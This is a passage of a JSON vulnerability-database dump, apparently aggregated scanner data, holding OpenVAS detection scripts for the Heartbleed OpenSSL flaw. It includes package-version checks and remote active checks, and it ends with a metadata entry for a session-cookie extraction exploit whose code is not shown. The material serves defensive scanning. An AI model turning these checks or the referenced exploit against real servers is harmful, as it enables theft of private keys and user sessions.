\"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-static\", rpm:\"openssl-static~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-12-21T20:04:20", "references": ["http://openssl.org/", "http://www.securityfocus.com/bid/66690", "https://www.openssl.org/news/secadv/20140407.txt"], "pluginID": "1361412562310103936", "description": "OpenSSL is prone to an information disclosure vulnerability.", "edition": 5, "reporter": "This script is Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-04-09T00:00:00", "title": "SSL/TLS: OpenSSL TLS 'heartbeat' Extension Information Disclosure Vulnerability", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SSL and TLS", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2018-12-21T00:00:00", "id": "OPENVAS:1361412562310103936", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103936", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_openssl_heartbeat_66690.nasl 12865 2018-12-21 10:51:07Z cfischer $\n#\n# SSL/TLS: OpenSSL TLS 'heartbeat' Extension Information Disclosure Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103936\");\n script_version(\"$Revision: 12865 $\");\n script_bugtraq_id(66690);\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-21 11:51:07 +0100 (Fri, 21 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-09 09:54:09 +0200 (Wed, 09 Apr 2014)\");\n script_name(\"SSL/TLS: OpenSSL TLS 'heartbeat' Extension Information Disclosure Vulnerability\");\n script_category(ACT_ATTACK);\n script_family(\"SSL and TLS\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_tls_version_get.nasl\");\n script_mandatory_keys(\"ssl_tls/port\");\n\n script_xref(name:\"URL\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/66690\");\n script_xref(name:\"URL\", value:\"http://openssl.org/\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this issue to gain access to sensitive\n information that may aid in further attacks.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a special crafted TLS request and check the response.\");\n\n script_tag(name:\"insight\", value:\"The TLS and DTLS implementations do not properly handle\n Heartbeat Extension packets.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"OpenSSL is prone to an information disclosure vulnerability.\");\n\n script_tag(name:\"affected\", value:\"OpenSSL 1.0.1f, 1.0.1e, 1.0.1d, 1.0.1c, 1.0.1b, 1.0.1a, and\n 1.0.1 are vulnerable.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"ssl_funcs.inc\");\ninclude(\"gb_openssl_heartbeat.inc\");\n\nport = get_ssl_port();\nif( ! port ) exit( 0 );\n\nif( ! versions = get_supported_tls_versions( port:port, min:SSL_v3, max:TLS_12 ) ) exit( 0 );\n\nforeach version( versions ) {\n test_hb( port:port, version:version );\n}\n\nexit( 99 );", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:55:27", "references": ["2014:0376", "http://lists.centos.org/pipermail/centos-announce/2014-April/020249.html"], "pluginID": "1361412562310881918", "description": "Check for the Version of openssl", "edition": 4, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-04-08T00:00:00", "title": "CentOS Update for openssl CESA-2014:0376 centos6 ", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310881918", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881918", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for openssl CESA-2014:0376 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881918\");\n script_version(\"$Revision: 9373 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:57:18 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-08 11:30:13 +0530 (Tue, 08 Apr 2014)\");\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"CentOS Update for openssl CESA-2014:0376 centos6 \");\n\n tag_insight = \"OpenSSL is a toolkit that implements the Secure Sockets Layer\n(SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\n\";\n\n tag_affected = \"openssl on CentOS 6\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"CESA\", value: \"2014:0376\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2014-April/020249.html\");\n script_tag(name:\"summary\", value:\"Check for the Version of openssl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-static\", rpm:\"openssl-static~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:55:24", "references": ["http://www.debian.org/security/2014/dsa-2896.html"], "pluginID": "1361412562310702896", "description": "A vulnerability has been discovered\nin OpenSSL", "edition": 3, "reporter": "Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net", "published": "2014-04-07T00:00:00", "title": "Debian Security Advisory DSA 2896-1 (openssl - security update)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310702896", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310702896", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2896.nasl 9354 2018-04-06 07:15:32Z cfischer $\n# Auto-generated from advisory DSA 2896-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.702896\");\n script_version(\"$Revision: 9354 $\");\n script_cve_id(\"CVE-2014-0160\");\n script_name(\"Debian Security Advisory DSA 2896-1 (openssl - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2018-04-06 09:15:32 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name: \"creation_date\", value: \"2014-04-07 00:00:00 +0200 (Mon, 07 Apr 2014)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2896.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"openssl on Debian Linux\");\n script_tag(name: \"insight\", value: \"This package contains the openssl binary and related tools.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthis problem has been fixed in version 1.0.1e-2+deb7u5.\n\nFor the testing distribution (jessie), this problem has been fixed in\nversion 1.0.1g-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.0.1g-1.\n\nWe recommend that you upgrade your openssl packages.\");\n script_tag(name: \"summary\", value: \"A vulnerability has been discovered\nin OpenSSL's support for the TLS/DTLS Heartbeat extension. Up to 64KB of memory\nfrom either client or server can be recovered by an attacker. This vulnerability\nmight allow an attacker to compromise the private key and other sensitive data in\nmemory.\n\nAll users are urged to upgrade their openssl packages (especially\nlibssl1.0.0) and restart applications as soon as possible.\n\nAccording to the currently available information, private keys should be\nconsidered as compromised and regenerated as soon as possible. More\ndetails will be communicated at a later time.\n\nThe oldstable distribution (squeeze) is not affected by this\nvulnerability.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"1.0.1e-2+deb7u5\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-doc\", ver:\"1.0.1e-2+deb7u5\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl1.0.0\", ver:\"1.0.1e-2+deb7u5\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl1.0.0-dbg\", ver:\"1.0.1e-2+deb7u5\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssl\", ver:\"1.0.1e-2+deb7u5\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-27T10:48:58", "references": ["2014:0376-01", "https://www.redhat.com/archives/rhsa-announce/2014-April/msg00017.html"], "pluginID": "871154", "description": "Check for the Version of openssl", "edition": 2, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-04-08T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "RedHat Update for openssl RHSA-2014:0376-01", "type": "openvas", "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2017-07-12T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=871154", "id": "OPENVAS:871154", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for openssl RHSA-2014:0376-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(871154);\n script_version(\"$Revision: 6688 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:49:31 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-08 12:13:57 +0530 (Tue, 08 Apr 2014)\");\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"RedHat Update for openssl RHSA-2014:0376-01\");\n\n tag_insight = \"OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\n\";\n\n tag_affected = \"openssl on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"RHSA\", value: \"2014:0376-01\");\n script_xref(name: \"URL\" , value: \"https://www.redhat.com/archives/rhsa-announce/2014-April/msg00017.html\");\n script_summary(\"Check for the Version of openssl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~16.el6_5.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~1.0.1e~16.el6_5.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.1e~16.el6_5.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-10-26T14:39:13", "references": ["https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2016&suid=20160512_00"], "pluginID": "1361412562310105722", "description": "Symantec Messaging Gateway (SMG) Appliance 10.6.x management console was\nsusceptible to potential unauthorized loss of privileged information due to an inadvertent static link of an\nupdated component library to a version of SSL susceptible to the Heartbleed vulnerability (CVE-2014-0160).", "edition": 8, "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "published": "2016-05-17T00:00:00", "title": "Symantec Messaging Gateway 10.6.x ACE Library Static Link to Vulnerable SSL Version (SYM16-007)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2018-10-25T00:00:00", "id": "OPENVAS:1361412562310105722", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105722", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_symantec_messaging_gateway_sym16_007.nasl 12083 2018-10-25 09:48:10Z cfischer $\n#\n# Symantec Messaging Gateway 10.6.x ACE Library Static Link to Vulnerable SSL Version (SYM16-007)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:symantec:messaging_gateway\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105722\");\n script_version(\"$Revision: 12083 $\");\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-25 11:48:10 +0200 (Thu, 25 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-17 13:54:13 +0200 (Tue, 17 May 2016)\");\n\n script_name(\"Symantec Messaging Gateway 10.6.x ACE Library Static Link to Vulnerable SSL Version (SYM16-007)\");\n\n script_tag(name:\"summary\", value:\"Symantec Messaging Gateway (SMG) Appliance 10.6.x management console was\nsusceptible to potential unauthorized loss of privileged information due to an inadvertent static link of an\nupdated component library to a version of SSL susceptible to the Heartbleed vulnerability (CVE-2014-0160).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Symantec became aware of a recently updated ACE library shipped in SMG 10.6.x\nthat was statically linked inadvertently to a version of SSL susceptible to CVE-2014-0160, Heartbleed vice\ndynamically linked to the non-vulnerable SSL version in the shipping OS of the Appliance.\");\n\n script_tag(name:\"affected\", value:\"SMG 10.x, 10.6.1 and earlier.\");\n\n script_tag(name:\"solution\", value:\"Update to SMG 10.6.1-3 or newer.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2016&suid=20160512_00\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_symantec_messaging_gateway_detect.nasl\");\n script_mandatory_keys(\"symantec_smg/detected\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! version = get_app_version( cpe:CPE, nofork:TRUE ) ) exit( 0 );\n\nif( version_is_less( version:version, test_version:\"10.6.1\" ) ) VULN = TRUE;\n\nif( version == \"10.6.1\" )\n{\n if( patch = get_kb_item( \"symantec_smg/patch\" ) )\n if( int( patch ) < 3 ) VULN = TRUE;\n}\n\nif( VULN )\n{\n if( patch ) version = version + \" Patch \" + patch;\n report = report_fixed_ver( installed_version:version, fixed_version:'10.6.1 Patch 3' );\n security_message( port:0, data:report );\n exit(0);\n}\n\n\nexit( 99 );\n\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:55:20", "references": ["http://openssl.org/", "http://www.securityfocus.com/bid/66690"], "pluginID": "1361412562310105010", "description": "OpenSSL is prone to an information disclosure vulnerability.\n\n This NVT has been merged into the NVT ", "edition": 4, "reporter": "This script is Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-04-09T00:00:00", "title": "OpenSSL TLS 'heartbeat' Extension Information Disclosure Vulnerability (STARTTLS Check)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2018-08-24T00:00:00", "id": "OPENVAS:1361412562310105010", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105010", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_openssl_heartbeat_starttls_66690.nasl 11108 2018-08-24 14:27:07Z mmartin $\n#\n# OpenSSL TLS 'heartbeat' Extension Information Disclosure Vulnerability STARTTLS Check\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105010\");\n script_version(\"$Revision: 11108 $\");\n script_bugtraq_id(66690);\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-24 16:27:07 +0200 (Fri, 24 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-09 09:54:09 +0200 (Wed, 09 Apr 2014)\");\n script_name(\"OpenSSL TLS 'heartbeat' Extension Information Disclosure Vulnerability (STARTTLS Check)\");\n script_category(ACT_ATTACK);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_starttls_pop3.nasl\", \"gb_starttls_imap.nasl\", \"gb_starttls_ftp.nasl\", \"gb_starttls_smtp.nasl\",\n \"gb_postgres_tls_support.nasl\", \"gb_starttls_xmpp.nasl\", \"gb_starttls_nntp.nasl\", \"gb_starttls_ldap.nasl\");\n script_mandatory_keys(\"ssl_tls/port\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/66690\");\n script_xref(name:\"URL\", value:\"http://openssl.org/\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this issue to gain access to sensitive\n information that may aid in further attacks.\");\n script_tag(name:\"vuldetect\", value:\"Send a special crafted TLS request and check the response.\");\n script_tag(name:\"insight\", value:\"The TLS and DTLS implementations do not properly handle\n Heartbeat Extension packets.\");\n script_tag(name:\"solution\", value:\"Updates are available.\");\n script_tag(name:\"summary\", value:\"OpenSSL is prone to an information disclosure vulnerability.\n\n This NVT has been merged into the NVT 'OpenSSL TLS 'heartbeat' Extension Information Disclosure Vulnerability' (OID: 1.3.6.1.4.1.25623.1.0.103936).\");\n script_tag(name:\"affected\", value:\"OpenSSL 1.0.1f, 1.0.1e, 1.0.1d, 1.0.1c, 1.0.1b, 1.0.1a, and\n 1.0.1 are vulnerable.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_tag(name:\"deprecated\", value:TRUE);\n\n exit(0);\n}\n\nexit(66);\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "zdt": [{"lastseen": "2018-03-14T02:43:51", "references": [], "edition": 2, "description": "This python script is a modification of the heartbleed proof of concept exploit that looks for cookies, specifically user sessions.", "reporter": "Jared Stafford", "published": "2014-04-09T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "zdt", "title": "Heartbleed User Session Extraction Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": 